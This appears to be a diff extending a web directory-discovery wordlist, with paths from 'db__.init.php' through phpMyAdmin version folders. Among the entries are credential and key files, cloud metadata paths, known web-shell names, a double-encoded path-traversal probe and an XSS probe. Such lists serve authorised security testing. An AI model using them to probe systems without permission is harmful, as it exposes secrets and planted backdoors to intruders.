+db__.init.php
+db_admin
+db_backup.sql
+db_backups/
+db_session.init.php
+db_status.php
+dbaccess.log
+dbadmin.php
+dbadmin/
+dbadmin/index.php
+dbase
+dbase.sql
+dbbackup/
+dbdump.sql
+dbfix/
+dbweb/
+dead.letter
+DEADJOE
+debug
+debug-output.txt
+debug.inc
+debug.log
+debug.php
+debug.py
+debug.txt
+debug.xml
+debug/
+debug/pprof
+debug_error.jsp
+delete.php
+demo
+demo.php
+demo/
+demo/ejb/index.html
+demo/ojspext/events/globals.jsa
+demo/sql/index.jsp
+demos/
+denglu
+denglu/
+denglu/admin.asp
+depcomp
+dependency-reduced-pom.xml
+deploy
+deploy.env
+deploy.rb
+deploy.sh
+deps
+deps/deps.jl
+DerivedData/
+DerivedDataCache/
+desk/
+Desktop.ini
+desktop/
+desktop/index_framed.htm
+dev
+dev.env
+dev.php
+dev.zip
+dev/
+devdata.db
+devel/
+devel_isolated/
+develop-eggs/
+development-parts/
+development.esproj/
+development.log
+development/
+deviceupdatefiles_ext/
+deviceupdatefiles_int/
+df_main.sql
+dfshealth.jsp
+dhcp_log/
+dialin/
+dir-login/
+dir.php
+directadmin/
+dist
+dist/
+dkms.conf
+dlldata.c
+dms/AggreSpy
+dms/DMSDump
+dns.alpha.kubernetes.io
+doc
+doc/
+doc/api/
+docker-compose-dev.yml
+docker-compose.yml
+docker/
+Dockerfile
+DocProject/buildhelp/
+DocProject/Help/html
+DocProject/Help/Html2
+docs
+docs.json
+docs/
+docs/_build/
+docs/api-docs.json
+doctrine/
+doctrine/schema/eirec.yml
+doctrine/schema/tmx.yml
+documentation
+documentation/
+documentation/config.yml
+dokuwiki/
+dom.php
+domcfg.nsf
+door.php
+dotenv.env
+down/
+down/login
+download/
+download/history.csv
+download/users.csv
+downloader/
+downloader/cache.cfg
+downloader/connect.cfg
+downloadFile.php
+downloads/
+downloads/dom.php
+dra.php
+dswsbobje/
+dswsbobje/happyaxis.jsp
+duckrails/mocks/
+dummy
+dummy.php
+dump
+dump.7z
+dump.html
+dump.inc
+dump.inc.old
+dump.json
+dump.log
+dump.old
+dump.rar
+dump.rdb
+dump.sh
+dump.sql
+dump.sql.old
+dump.sql.tgz
+dump.sqlite
+dump.tar
+dump.tar.bz2
+dump.tar.gz
+dump.tgz
+dump.txt
+dump.zip
+dump/
+dumper.php
+dumper/
+dumps/
+dwsync.xml
+dz.php
+dz0.php
+dz1.php
+eagle.epf
+ecf/
+ecosystem.json
+ecp/
+edit.php
+editor-4.0.0-en.php
+editor-4.0.0-mysql-en.php
+editor-4.0.0.php
+editor-4.0.1-en.php
+editor-4.0.1-mysql-en.php
+editor-4.0.1.php
+editor-4.0.2-en.php
+editor-4.0.2-mysql-en.php
+editor-4.0.2.php
+editor-4.0.3-en.php
+editor-4.0.3-mysql-en.php
+editor-4.0.3.php
+editor-4.1.0-en.php
+editor-4.1.0-mysql-en.php
+editor-4.1.0.php
+editor-4.2.0-en.php
+editor-4.2.0-mysql-en.php
+editor-4.2.0.php
+editor-4.2.1-en.php
+editor-4.2.1-mysql-en.php
+editor-4.2.1.php
+editor-4.2.2-en.php
+editor-4.2.2-mysql-en.php
+editor-4.2.2.php
+editor-4.2.3-en.php
+editor-4.2.3-mysql-en.php
+editor-4.2.3.php
+editor-4.2.4-en.php
+editor-4.2.4-mysql-en.php
+editor-4.2.4.php
+editor-4.2.5-en.php
+editor-4.2.5-mysql-en.php
+editor-4.2.5.php
+editor-4.3.0-en.php
+editor-4.3.0-mysql-en.php
+editor-4.3.0.php
+editor-4.3.1-en.php
+editor-4.3.1-mysql-en.php
+editor-4.3.1.php
+editor-4.4.0-en.php
+editor-4.4.0-mysql-en.php
+editor-4.4.0.php
+editor-4.5.0-en.php
+editor-4.5.0-mysql-en.php
+editor-4.5.0.php
+editor-4.6.0-en.php
+editor-4.6.0-mysql-en.php
+editor-4.6.0.php
+editor-4.6.1-en.php
+editor-4.6.1-mysql-en.php
+editor-4.6.1.php
+editor-4.6.2-en.php
+editor-4.6.2-mysql-en.php
+editor-4.6.2.php
+editor-4.6.3-en.php
+editor-4.6.3-mysql-en.php
+editor-4.6.3.php
+editor-4.7.0-en.php
+editor-4.7.0-mysql-en.php
+editor-4.7.0.php
+editor-4.7.1-en.php
+editor-4.7.1-mysql-en.php
+editor-4.7.1.php
+editor-4.7.2-en.php
+editor-4.7.2-mysql-en.php
+editor-4.7.2.php
+editor-4.7.3-en.php
+editor-4.7.3-mysql-en.php
+editor-4.7.3.php
+editor-4.7.4-en.php
+editor-4.7.4-mysql-en.php
+editor-4.7.4.php
+editor-4.7.5-en.php
+editor-4.7.5-mysql-en.php
+editor-4.7.5.php
+editor-4.7.6-en.php
+editor-4.7.6-mysql-en.php
+editor-4.7.6.php
+editor-4.7.7-en.php
+editor-4.7.7-mysql-en.php
+editor-4.7.7.php
+editor-4.7.8-en.php
+editor-4.7.8-mysql-en.php
+editor-4.7.8.php
+editor-4.7.9-en.php
+editor-4.7.9-mysql-en.php
+editor-4.7.9.php
+editor-4.8.0-en.php
+editor-4.8.0-mysql-en.php
+editor-4.8.0.php
+editor-4.8.1-en.php
+editor-4.8.1-mysql-en.php
+editor-4.8.1.php
+editor.php
+editor/
+editor/FCKeditor
+editor/stats/
+editor/tiny_mce/
+editor/tinymce/
+editors/
+editors/FCKeditor
+EemAdminService/EemAdmin?wsdl
+eggs/
+ehthumbs.db
+elastic/
+elasticsearch/
+elfinder/
+elfinder/elfinder.php
+elm-stuff
+elmah.axd
+email/
+encode-explorer.php
+encode-explorer_5.0/
+encode-explorer_5.1/
+encode-explorer_6.0/
+encode-explorer_6.1/
+encode-explorer_6.2/
+encode-explorer_6.3/
+encode-explorer_6.4.1/
+encode-explorer_6.4/
+encode_explorer-3.2/
+encode_explorer-3.3/
+encode_explorer-3.4/
+encode_explorer-4.0/
+encode_explorer.php
+encode_explorer/
+encode_explorer_32/
+engine.tar.gz
+engine.zip
+engine/
+engine/classes/swfupload/swfupload.swf
+engine/classes/swfupload/swfupload_f9.swf
+engine/log.txt
+env
+env.bak/
+env.js
+env.json
+env.list
+ENV/
+env/
+environment.rb
+erl_crash.dump
+err
+err.log
+err.txt
+error
+error-log
+error-log.txt
+error.asp
+error.cpp
+error.ctp
+error.html
+error.ini
+error.log
+error.log.0
+error.tmpl
+error.tpl
+error.txt
+error.xml
+error/
+error_import
+error_log
+error_log.gz
+error_log.txt
+errorlog
+errorPages
+errors.asp
+errors.log
+errors.tpl
+errors.txt
+errors/
+errors/creation
+errors/local.xml
+etc
+etc/
+etc/config.ini
+etc/database.xml
+etc/hosts
+etc/lib/pChart2/examples/imageMap/index.php
+etc/passwd
+etcd-apiserver-client.key
+etcd-ca.crt
+etcd-events.log
+etcd.log
+eudora.ini
+eula.txt
+eula_en.txt
+ews/
+example.php
+examples
+examples/
+examples/jsp/%252e%252e/%252e%252e/manager/html/
+examples/jsp/snp/snoop.jsp
+examples/servlet/SnoopServlet
+examples/servlets/servlet/CookieExample
+examples/servlets/servlet/RequestHeaderExample
+exception.log
+exchange/
+exchweb/
+exec
+expires.conf
+exploded-archives/
+explore
+explore/repos
+explorer
+export
+export.cfg
+export/
+export_presets.cfg
+ExportedObj/
+exports.zip
+ext/
+ext/.deps
+ext/build/
+ext/config
+ext/install-sh
+ext/libtool
+ext/ltmain.sh
+ext/Makefile
+ext/missing
+ext/mkinstalldirs
+ext/modules/
+ext/run-tests.php
+extjs/
+extjs/resources//charts.swf
+extras/documentation
+ezsqliteadmin/
+fabric/
+fake-eggs/
+FakesAssemblies/
+FAQ
+fastlane/Preview.html
+fastlane/readme.md
+fastlane/report.xml
+fastlane/screenshots
+fastlane/test_output
+fcgi-bin/echo
+fcgi-bin/echo.exe
+fcgi-bin/echo2
+fcgi-bin/echo2.exe
+FCKeditor
+fckeditor
+FCKeditor/
+fckeditor/
+fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/asp/connector.asp
+fckeditor/editor/filemanager/connectors/asp/upload.asp
+fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+fckeditor/editor/filemanager/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/php/upload.php
+fckeditor/editor/filemanager/upload/asp/upload.asp
+fckeditor/editor/filemanager/upload/aspx/upload.aspx
+fckeditor/editor/filemanager/upload/php/upload.php
+FCKeditor2.0/
+FCKeditor2.1/
+FCKeditor2.2/
+FCKeditor2.3/
+FCKeditor2.4/
+FCKeditor2/
+FCKeditor20/
+FCKeditor21/
+FCKeditor22/
+FCKeditor23/
+FCKeditor24/
+features
+features.json
+feixiang.php
+file.php
+file_manager/
+file_upload.asp
+file_upload.aspx
+file_upload.cfm
+file_upload.htm
+file_upload.html
+file_upload.php
+file_upload.php3
+file_upload.shtm
+file_upload/
+fileadmin
+fileadmin.php
+fileadmin/
+fileadmin/_processed_/
+fileadmin/_temp_/
+fileadmin/user_upload/
+filedump/
+filemanager
+filemanager/
+filemanager/views/js/ZeroClipboard.swf
+filerun.php
+filerun/
+files.7z
+files.md5
+files.php
+files.rar
+files.tar
+files.tar.bz2
+files.tar.gz
+files.zip
+files/
+Files/binder.autosave
+Files/binder.backup
+files/cache/
+Files/Docs/docs.checksum
+Files/search.indexes
+files/tmp/
+Files/user.lock
+fileupload/
+filezilla.xml
+FileZilla.xml
+findbugs/
+firebase-debug.log
+flash/
+flash/ZeroClipboard.swf
+flashFXP.ini
+fluent.conf
+fluent_aggregator.conf
+flyway
+fmr.php
+formslogin/
+forum.rar
+forum.sql
+forum.tar
+forum.tar.bz2
+forum.tar.gz
+forum.zip
+forum/
+forum/install/install.php
+forums/
+forums/cache/db_update.lock
+fpadmin
+fpadmin/
+fpm-ping
+fpm-status
+framework.zip
+framework/yiic.php
+freeline.py
+freeline/
+freeline_project_description.json
+ftp.txt
+fuel/app/cache/
+fuel/app/config/
+fuel/app/logs/
+function.require
+functions/
+ganglia/
+gateway/
+gaza.php
+gbpass.pl
+Gemfile
+Gemfile.lock
+GEMINI/
+gen/
+Generated_Code/
+get.php
+getFile.cfm
+git-service
+git/
+github-cache
+github-recovery-codes.txt
+github/
+gitlab/
+gitlog
+gl/
+global
+global.asa
+global.asa.bak
+global.asa.old
+global.asa.orig
+global.asa.temp
+global.asa.tmp
+global.asax
+global.asax.bak
+global.asax.old
+global.asax.orig
+global.asax.temp
+global.asax.tmp
+globals
+globals.inc
+globals.jsa
+globes_admin/
+glpi/
+google-services.json
+grabbed.html
+gradle-app.setting
+gradle/
+grafana/
+graphiql
+graphiql.php
+graphiql/
+graphite/
+graphql
+graphql.js
+graphql.php
+graphql/
+graphql/console/
+grappelli/
+graylog/
+groovy/
+groupexpansion/
+GruntFile.coffee
+Gruntfile.coffee
+gruntfile.coffee
+Gruntfile.js
+gruntFile.js
+gruntfile.js
+guanli
+guanli/
+guanli/admin.asp
+Guardfile
+gulp-azure-sync-assets.js
+Gulpfile
+Gulpfile.coffee
+gulpfile.coffee
+Gulpfile.js
+gulpfile.js
+gwt-unitCache/
+h2console
+hac/
+happyaxis.jsp
+haproxy/
+health
+health.json
+healthcheck.php
+heapdump
+heapdump.json
+HISTORY
+HISTORY.txt
+hmc/
+HNAP1/
+hndUnblock.cgi
+home.html
+home.php
+home.rar
+home.tar
+home.tar.bz2
+home.tar.gz
+home.zip
+Homestead.json
+Homestead.yaml
+host-manager/
+host-manager/html
+hosts
+houtai
+houtai/
+houtai/admin.asp
+hpwebjetadmin/
+hs_err_pid.log
+htaccess.backup
+htaccess.bak
+htaccess.dist
+htaccess.old
+htaccess.txt
+htdocs
+htdocs.zip
+htgroup
+html.tar
+html.tar.bz2
+html.tar.gz
+html.zip
+html/
+html/config.rb
+html/js/misc/swfupload/swfupload.swf
+html/js/misc/swfupload/swfupload_f9.swf
+htmlcov/
+htpasswd
+htpasswd.bak
+htpasswd/
+htpasswd/htpasswd.bak
+Http/
+Http/DataLayCfg.xml
+http_access.log
+httpd.conf
+httpd.conf.backup
+httpd.conf.default
+httpd.core
+httpd.ini
+httpd/
+httpd/logs/access.log
+httpd/logs/access_log
+httpd/logs/error.log
+httpd/logs/error_log
+httptrace
+hudson/
+hudson/login
+hybridconfig/
+hystrix
+i.php
+icinga/
+id_dsa
+id_dsa.ppk
+id_rsa
+id_rsa.pub
+iiasdmpwd/
+iisadmin/
+images/
+images/c99.php
+images/Sym.php
+import.php
+import/
+import_error.log
+importcockpit/
+in/
+inc/
+inc/config.inc
+inc/fckeditor/
+inc/tiny_mce/
+inc/tinymce/
+include
+include/
+include/fckeditor/
+includes
+includes/
+includes/adovbs.inc
+includes/bootstrap.inc
+includes/configure.php~
+includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
+includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/php/upload.php
+includes/fckeditor/editor/filemanager/upload/asp/upload.asp
+includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/upload/php/upload.php
+includes/js/tiny_mce/
+includes/swfupload/swfupload.swf
+includes/swfupload/swfupload_f9.swf
+includes/tiny_mce/
+includes/tinymce/
+index-bak
+index-test.php
+index.htm
+index.html
+index.php
+index.php-bak
+index.php.bak
+index.php3
+index.php4
+index.php5
+index.php~
+index.tar
+index.tar.bz2
+index.tar.gz
+index.xml
+index.zip
+index2.php
+index3.php
+index_manage
+Indy_admin/
+influxdb/
+info
+info.json
+info.php
+info.txt
+infos.php
+ingress.yaml
+init/
+inspector
+instadmin/
+INSTALL
+Install
+install
+install-log.txt
+install-sh
+install.asp
+install.aspx
+install.bak
+install.config
+install.htm
+INSTALL.HTML
+INSTALL.html
+Install.html
+install.html
+install.inc
+INSTALL.MD
+INSTALL.md
+Install.md
+install.md
+INSTALL.mysql
+install.mysql
+INSTALL.mysql.txt
+install.mysql.txt
+INSTALL.pgsql
+install.pgsql
+INSTALL.pgsql.txt
+install.pgsql.txt
+install.php
+install.rdf
+install.sql
+install.tpl
+INSTALL.TXT
+INSTALL.txt
+Install.txt
+install.txt
+install.zip
+install/
+install/index.php?upgrade/
+install/update.log
+install_
+INSTALL_admin
+install_manifest.txt
+install_mgr.log
+installation.php
+installation/
+installed.json
+InstalledFiles
+installer
+installer-backup.php
+installer-data.sql
+installer-log.txt
+installer.php
+installer_files/
+install~/
+instance/
+integrationgraph
+Intermediate/
+internal/docs
+invoker/
+invoker/JMXInvokerServlet
+invoker/readonly/JMXInvokerServlet
+invoker/restricted/JMXInvokerServlet
+io.swf
+iOSInjectionProject/
+ipch/
+irc-macadmin/
+irequest/
+isadmin
+isadmin.php
+ispmgr/
+iwa/authenticated.aspx
+iwa/iwa_test.aspx
+j2ee/servlet/SnoopServlet
+jacoco/
+Jakefile
+javascripts/bundles
+javax.faces.resource.../
+javax.faces.resource.../WEB-INF/web.xml.jsf
+jboss-net/
+jboss-net//happyaxis.jsp
+jboss-net/happyaxis.jsp
+jboss/server/all/deploy/project.ext
+jboss/server/all/log/
+jboss/server/default/deploy/project.ext
+jboss/server/default/log/
+jboss/server/minimal/deploy/project.ext
+jbossws/services
+jbpm-console/app/tasks.jsf
+jdbc
+jdkstatus
+jenkins/
+Jenkinsfile
+jira/
+jk-status
+jk/
+jkmanager
+jkmanager-auth
+jkstatus
+jkstatus-auth
+jmx-console
+jmx-console/
+jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
+jo.php
+jolokia
+jolokia/
+jolokia/list
+joomla.rar
+joomla.xml
+joomla.zip
+joomla/
+joomla/administrator
+js/
+js/elfinder/elfinder.php
+js/envConfig.js
+js/FCKeditor
+js/prepod.js
+js/prod.js
+js/qa.js
+js/routing
+js/swfupload/swfupload.swf
+js/swfupload/swfupload_f9.swf
+js/tiny_mce/
+js/tinymce/
+js/yui/uploader/assets/uploader.swf
+js/ZeroClipboard.swf
+js/ZeroClipboard10.swf
+jscripts/
+jscripts/tiny_mce/
+jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
+jscripts/tinymce/
+jsp-examples/
+jsp-reverse.jsp
+jsp/viewer/snoop.jsp
+jspm_packages/
+jssresource/
+juju/
+junit/
+kafka/
+kairosdb/
+karma.conf.js
+kcfinder/
+kcfinder/browse.php
+key.pem
+keys.json
+kibana/
+killer.php
+known_tokens.csv
+kpanel/
+krb.log
+krblog.txt
+kube-apiserver.log
+kube-controller-manager.log
+kube-proxy.log
+kube-scheduler.log
+kube/
+kuber/
+kubernetes/
+l0gs.txt
+L3b.php
+lander.logs
+latest/meta-data/hostname
+latest/user-data
+layouts/
+ldap.prop
+ldap.prop.sample
+ldap/
+letmein
+letmein.php
+letmein/
+level
+lfm.php
+lg/
+lg/lg.conf
+lia.cache
+lib-cov
+lib/
+lib/bundler/man/
+lib/fckeditor/
+lib/flex/uploader/.actionScriptProperties
+lib/flex/uploader/.flexProperties
+lib/flex/uploader/.project
+lib/flex/uploader/.settings
+lib/flex/varien/.actionScriptProperties
+lib/flex/varien/.flexLibProperties
+lib/flex/varien/.project
+lib/flex/varien/.settings
+lib/tiny_mce/
+lib/tinymce/
+lib64/
+libraries/
+libraries/phpmailer/
+libraries/tiny_mce/
+libraries/tinymce/
+librepag.log
+LICENSE
+license
+LICENSE.md
+license.md
+license.php
+LICENSE.txt
+license.txt
+license_key.php
+liferay.log
+liferay/
+lighttpd.access.log
+lighttpd.error.log
+lilo.conf
+lindex.php
+linkhub/
+linkhub/linkhub.log
+linktous.html
+linusadmin-phpinfo.php
+liquibase
+list_emails
+listener.log
+lists/
+lists/config
+LiveUser_Admin/
+lk/
+load.php
+local.config.rb
+local.properties
+local.xml.additional
+local.xml.template
+local/
+local/composer.lock
+local/composer.phar
+local_bd_new.txt
+local_bd_old.txt
+local_conf.php.bac
+local_conf.php.bak
+local_settings.py
+localhost.sql
+localsettings.php.bak
+localsettings.php.dist
+localsettings.php.old
+localsettings.php.save
+localsettings.php.swp
+localsettings.php.txt
+localsettings.php~
+log
+log-in
+log-in.php
+log-in/
+log.htm
+log.html
+log.json
+log.mdb
+log.php
+log.sqlite
+log.txt
+log/
+log/access.log
+log/access_log
+log/authorizenet.log
+log/development.log
+log/error.log
+log/error_log
+log/exception.log
+log/librepag.log
+log/log.log
+log/log.txt
+log/old
+log/payment.log
+log/payment_authorizenet.log
+log/payment_paypal_express.log
+log/production.log
+log/server.log
+log/test.log
+log/www-error.log
+log_1.txt
+log_errors.txt
+log_in
+log_in.php
+log_in/
+logexpcus.txt
+logfile
+logfile.txt
+logfiles
+loggers
+loggers.json
+loggers/
+logi.php
+login
+login-gulp.js
+login-redirect/
+login-us/
+login.asp
+login.cgi
+login.htm
+login.html
+login.json
+login.php
+login/
+login/admin/admin.asp
+login/index
+login/login
+login/super
+login1
+login1/
+login_admi
+login_admin
+login_admin/
+login_db/
+login_ou.php
+login_out
+login_out/
+login_use.php
+login_user
+loginerror/
+loginflat/
+loginok/
+logins.txt
+loginsave/
+loginsupe.php
+loginsuper
+loginsuper/
+logo_sysadmin/
+logou.php
+logout
+logout.asp
+logout/
+logs
+logs.htm
+logs.html
+logs.mdb
+logs.pl
+logs.sqlite
+logs.txt
+Logs/
+logs/
+logs/access.log
+logs/access_log
+logs/error.log
+logs/error_log
+logs/liferay.log
+logs/mail.log
+logs/proxy_access_ssl_log
+logs/proxy_error_log
+logs/wsadmin.traceout
+logs/www-error.log
+logs_backup/
+logs_console/
+logstash/
+lol.php
+Lotus_Domino_Admin/
+ltmain.sh
+luac.out
+m4/libtool.m4
+m4/ltoptions.m4
+m4/ltsugar.m4
+m4/ltversion.m4
+m4/lt~obsolete.m4
+macadmin/
+madspot.php
+madspotshell.php
+magic.default
+magmi/
+magmi/conf/magmi.ini
+mail
+mail.log
+mail/
+Mail/smtp/Admin/smadv.asp
+mailer/.env
+mailman/
+mailman/listinfo
+main.env
+main.mdb
+main.zip
+main/
+main/login
+maint/
+MAINTAINERS.txt
+maintenance.flag
+maintenance.flag.bak
+maintenance.flag2
+maintenance.html
+maintenance.php
+maintenance/
+maintenance/test.php
+maintenance/test2.php
+Makefile
+Makefile.in
+Makefile.old
+manage
+manage.php
+manage.py
+manage/
+manage/admin.asp
+manage/login.asp
+manage_index
+management
+management.php
+management/
+management/configprops
+management/env
+manager
+manager.php
+manager/
+manager/admin.asp
+manager/html
+manager/login
+manager/login.asp
+manager/status/all
+MANIFEST
+MANIFEST.bak
+MANIFEST.MF
+manifest.mf
+manifest.yml
+manifest/cache/
+manifest/logs/
+manifest/tmp/
+manuallogin/
+mappings
+mappings.json
+master.passwd
+master.tar
+master.tar.bz2
+master.tar.gz
+master.zip
+master/
+master/portquotes_new/admin.log
+mattermost/
+maven/
+mbox
+mcollective/
+mcx/
+mcx/mcxservice.svc
+mdate-sh
+media.tar
+media.tar.bz2
+media.tar.gz
+media.zip
+media/
+media/export-criteo.xml
+meet/
+meeting/
+member
+member.php
+member/
+member/admin.asp
+member/login.asp
+memberadmin
+memberadmin.php
+memberadmin/
+memberlist
+members
+members.csv
+members.log
+members.mdb
+members.php
+members.sql
+members.sql.gz
+members.sqlite
+members.txt
+members.xls
+members/
+membersonly
+memcached/
+memlogin/
+mercurial.ini
+mercurial/
+Mercury.modules
+Mercury/
+mesos/
+META-INF/
+META-INF/context.xml
+META.json
+META.yml
+meta_login/
+metadata.rb
+metric/
+metric_tracking
+metric_tracking.json
+metrics
+metrics.json
+metrics/
+microsoft-server-activesync/
+mics/
+mics/mics.html
+mifs/
+mifs/user/index.html
+migration.log
+mimosa-config.coffee
+mimosa-config.js
+mirror.cfg
+mirror/
+misc
+missing
+mkdocs.yml
+Mkfile.old
+moadmin.php
+moadmin/
+mock/
+modelsearch/
+modelsearch/admin.html
+modelsearch/admin.php
+modelsearch/index.html
+modelsearch/index.php
+modelsearch/login
+modelsearch/login.html
+modelsearch/login.php
+moderator
+moderator.html
+moderator.php
+moderator/
+moderator/admin
+moderator/admin.html
+moderator/admin.php
+moderator/login
+moderator/login.html
+moderator/login.php
+modern.json
+modern.jsonp
+Module.symvers
+module.zip
+modules.order
+modules/
+modules/admin/
+mongo/
+mongodb/
+monit/
+monitor
+monitor/
+monitoring
+monitoring/
+moving.page
+mrtg.cfg
+msg/
+msg_gen/
+msmtp_default.log
+msql/
+mssql/
+mt-check.cgi
+munin/
+muracms.esproj
+mw-config/
+mx.php
+my.7z
+my.rar
+my.tar
+my.tar.bz2
+my.tar.gz
+my.zip
+myadm/
+MyAdmin/
+myadmin/
+myadmin/index.php
+MyAdmin/scripts/setup.php
+myadmin/scripts/setup.php
+myadmin2/index.php
+myadminscripts/
+myadminscripts/setup.php
+myconf.env
+myserver.key
+mysql-admin/
+mysql-admin/index.php
+mysql.err
+mysql.log
+mysql.php
+mysql.sql
+mysql.tar
+mysql.tar.bz2
+mysql.tar.gz
+mysql.zip
+mysql/
+mysql/admin/
+mysql/db/
+mysql/dbadmin/
+mysql/index.php
+mysql/mysqlmanager/
+mysql/pMA/
+mysql/pma/
+mysql/scripts/setup.php
+mysql/sqlmanager/
+mysql/web/
+mysql_debug.sql
+mysqladmin/
+mysqladmin/index.php
+mysqladmin/scripts/setup.php
+mysqldump.sql
+mysqldumper/
+mysqlitedb.db
+mysqlmanager/
+naginator/
+nagios/
+nano.save
+native_stderr.log
+native_stdout.log
+navSiteAdmin/
+nb-configuration.xml
+nbactions.xml
+nbproject/
+nbproject/private/private.properties
+nbproject/private/private.xml
+nbproject/project.properties
+nbproject/project.xml
+netdata/
+New%20Folder
+New%20folder%20(2)
+new.7z
+new.php
+new.rar
+new.tar
+new.tar.bz2
+new.tar.gz
+new.zip
+newbbs/
+newbbs/login
+newsadmin/
+nextcloud/
+nfs/
+ng-cli-backup.json
+nginx-access.log
+nginx-error.log
+nginx-ssl.access.log
+nginx-ssl.error.log
+nginx-status/
+nginx.conf
+nginx_status
+nginx_template.conf
+ngx_pagespeed_beacon/
+nia.cache
+nimcache/
+nlia.cache
+node-role.kubernetes.io
+node_modules
+node_modules/
+nohup.out
+nosetests.xml
+npm-debug.log
+npm-shrinkwrap.json
+nra.cache
+nst.php
+nstview.php
+nsw/
+nsw/admin/login.php
+nwp-content/
+nwp-content/plugins/disqus-comment-system/disqus.php
+nytprof.out
+oab/
+obj/
+ocp.php
+ocsp/
+odbc
+Office/
+Office/graph.php
+olap/
+old
+old.7z
+old.htaccess
+old.htpasswd
+old.rar
+old.tar
+old.tar.bz2
+old.tar.gz
+old.zip
+old/
+old_files
+old_site/
+oldfiles
+ona
+opa-debug-js
+open-flash-chart.swf?get-data=xss
+OpenCover/
+openshift/
+openstack/
+opentsdb/
+openvpn.ovpn
+openvpnadmin/
+operador/
+operator/
+oprocmgr-service
+oprocmgr-status
+ops/
+oracle
+order.log
+order.txt
+order_add_log.txt
+order_log
+orders
+orders.csv
+orders.log
+orders.sql
+orders.sql.gz
+orders.txt
+orders.xls
+orders_log
+orleans.codegen.cs
+ospfd.conf
+osticket/
+otrs/
+out.txt
+out/
+output
+output-build.txt
+output/
+OWA/
+owa/
+owncloud/
+p.php
+p/
+p/m/a/
+package-cache
+package-lock.json
+package.json
+Package.StoreAssociation.xml
+package/
+packer_cache/
+pagerduty/
+pages/
+pages/admin/
+pages/admin/admin-login
+pages/admin/admin-login.html
+pages/admin/admin-login.php
+painel/
+painel/config/config.php.example
+paket-files/
+panel
+panel-administracion/
+panel-administracion/admin.html
+panel-administracion/admin.php
+panel-administracion/index.html
+panel-administracion/index.php
+panel-administracion/login
+panel-administracion/login.html
+panel-administracion/login.php
+panel.php
+panel/
+params.txt
+parts/
+pass
+pass.dat
+pass.txt
+passes.txt
+passlist
+passlist.txt
+passwd
+passwd.adjunct
+passwd.bak
+passwd.txt
+Password
+password
+password.html
+password.log
+password.mdb
+password.sqlite
+password.txt
+passwords
+passwords.html
+passwords.mdb
+passwords.sqlite
+passwords.txt
+path/
+path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+pause
+pause.json
+payment.log
+payment_authorizenet.log
+payment_paypal_express.log
+pbmadmin/
+pbx/
+pentaho/
+perl-reverse-shell.pl
+perlcmd.cgi
+persistentchat/
+personal
+personal.mdb
+personal.sqlite
+pg_hba.conf
+pgadmin
+pgadmin.log
+pgadmin/
+PharoDebug.log
+phinx.yml
+phoenix
+phoneconferencing/
+php
+php-backdoor.php
+php-cgi.core
+php-cli.ini
+php-cs-fixer.phar
+php-error.log
+php-error.txt
+php-errors.log
+php-errors.txt
+php-findsock-shell.php
+php-fpm/
+php-fpm/error.log
+php-fpm/www-error.log
+php-info.php
+php-my-admin/
+php-myadmin/
+php-reverse-shell.php
+php-tiny-shell.php
+php.core
+php.error.log
+php.ini
+php.ini-orig.txt
+php.ini.sample
+php.ini_
+php.ini~
+php.lnk
+php.log
+php.php
+php/
+php/dev/
+php/php.cgi
+php4.ini
+php5.fcgi
+php5.ini
+php_cli_errors.log
+php_error.log
+php_error_log
+php_errorlog
+php_errors.log
+phpadmin/
+phpadmin/index.php
+phpadminmy/
+phperrors.log
+phpFileManager.php
+phpFileManager/
+phpfm-1.6.1/
+phpfm-1.7.1/
+phpfm-1.7.2/
+phpfm-1.7.3/
+phpfm-1.7.4/
+phpfm-1.7.5/
+phpfm-1.7.6/
+phpfm-1.7.7/
+phpfm-1.7.8/
+phpfm-1.7/
+phpfm.php
+phpfm/
+phpinfo
+phpinfo.php
+phpinfo.php3
+phpinfo.php4
+phpinfo.php5
+phpinfos.php
+phpini.bak
+phpldapadmin
+phpldapadmin/
+phpliteadmin%202.php
+phpliteadmin.php
+phpLiteAdmin/
+phpLiteAdmin_/
+phpm/
+phpma/
+phpma/index.php
+phpmailer
+phpmanager/
+phpmem/
+phpmemcachedadmin/
+phpminiadmin.php
+phpminiadmin/
+phpMoAdmin/
+phpmoadmin/
+phpmy-admin/
+phpMy/
+phpmy/
+phpMyA/
+phpmyad-sys/
+phpmyad/
+phpMyAdmi/
+phpMyAdmin-2.10.0/
+phpMyAdmin-2.10.1/
+phpMyAdmin-2.10.2/
+phpMyAdmin-2.10.3/
+phpMyAdmin-2.11.0/
+phpMyAdmin-2.11.1/
+phpMyAdmin-2.11.10/
+phpMyAdmin-2.11.2/
+phpMyAdmin-2.11.3/
+phpMyAdmin-2.11.4/
+phpMyAdmin-2.11.5.1-all-languages/
+phpMyAdmin-2.11.5/
+phpMyAdmin-2.11.6-all-languages/
+phpMyAdmin-2.11.6/
+phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.7.1-all-languages/
+phpMyAdmin-2.11.7/
+phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.8.1-all-languages/
+phpMyAdmin-2.11.8.1/
+phpMyAdmin-2.11.9/
+phpMyAdmin-2.2.3/
+phpMyAdmin-2.2.6/
+phpMyAdmin-2.5.1/
+phpMyAdmin-2.5.4/
+phpMyAdmin-2.5.5-pl1/
+phpMyAdmin-2.5.5-rc1/
+phpMyAdmin-2.5.5-rc2/
+phpMyAdmin-2.5.5/
+phpMyAdmin-2.5.6-rc1/
+phpMyAdmin-2.5.6-rc2/
